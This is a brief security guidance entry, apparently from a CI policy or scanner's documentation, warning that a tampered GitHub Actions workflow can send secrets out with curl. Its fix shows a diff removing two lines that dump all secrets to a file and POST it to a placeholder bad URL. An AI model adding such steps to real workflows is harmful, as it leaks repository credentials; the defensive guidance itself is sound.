GitHub Actions curl is being with secrets

If a secret is able to be obtained in a workflow and a bad actor can modify the GitHub Action, they can send the secret to a website they own via curl.

Fix - Buildtime

GitHub Actions

Block code and remove code that attempts to exfiltrate secrets.

       run:  |
-         echo "${{ toJSON(secrets) }}" > .secrets
-         curl -X POST -s --data "@.secrets" <BADURL > /dev/null